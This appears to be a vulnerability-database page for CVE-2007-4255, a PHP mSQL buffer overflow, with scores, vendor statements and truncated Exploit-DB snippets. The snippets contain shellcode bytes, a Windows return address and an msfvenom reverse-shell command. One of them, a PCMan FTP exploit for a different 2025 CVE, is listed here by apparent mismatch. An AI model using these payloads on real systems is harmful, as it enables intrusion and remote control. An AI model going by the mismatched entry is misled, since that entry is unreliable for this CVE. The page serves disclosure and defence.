CVE-2007-4255
published 2007-08-08CVE-2007-4255: Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msql_connect…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.33%
94.8th percentile
Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msql_connect function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
CVE-2007-4255: Buffer overflow in the mSQL extension in PHP 5
vendor_redhat·CVSS 7.5
CVE-2007-4255 [HIGH] CVE-2007-4255: Buffer overflow in the mSQL extension in PHP 5
Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msql_connect function.
Statement: Not vulnerable. PHP packages as shipped with Red Hat Enterprise Linux versions 2.1, 3, 4, and 5 are not compiled with msql library and are not vulnerable to this issue.
GHSA
GHSA-vp44-326x-5c5g: Buffer overflow in the mSQL extension in PHP 5
ghsa_unreviewed·2022-05-01
CVE-2007-4255 [HIGH] GHSA-vp44-326x-5c5g: Buffer overflow in the mSQL extension in PHP 5
Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msql_connect function.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB
PHP mSQL (msql_connect) - Local Buffer Overflow
exploitdb·2007-08-08
CVE-2007-4255 PHP mSQL (msql_connect) - Local Buffer Overflow
PHP mSQL (msql_connect) - Local Buffer Overflow
---
*/
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}
$ret = "\xA3\x3D\x92\x7C"; #shell32.dll ->CALL EBP WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x58\x4a\x4f\x89" .
"\x2f\x95\x91\xc0\xdd\x98\xd3\x3e\x29\xa1\x87\xe4\xfa\xa0" .
"\xc2\x6e\xa5\x6e\x0c\x9a\x3c\xe5\x02\x17\x4a\xa6\x06\xa6" .
"\xa7\x5b\x1b\x23\xbe\x37\x47\x2f\xa0\x04\xb6\x94\x46\x01" .
"\xfa\x1a\x0c\x55\xf1\xd1\x62\x49\xa4\x6d\xc2\x79\xe8\x19" .
"\x4d\x37\x1a\x36\x01\x38\xf4\xa0\xf1\
Exploit-DB
PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)
exploitdb·2007-08-06
CVE-2007-4255 PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)
PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)
---
42424242
?>
# milw0rm.com [2007-08-06]
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/475660/100/0/threadedhttp://www.securityfocus.com/bid/25213https://exchange.xforce.ibmcloud.com/vulnerabilities/35830https://www.exploit-db.com/exploits/4260http://www.securityfocus.com/archive/1/475660/100/0/threadedhttp://www.securityfocus.com/bid/25213https://exchange.xforce.ibmcloud.com/vulnerabilities/35830https://www.exploit-db.com/exploits/4260
2007-08-08
Published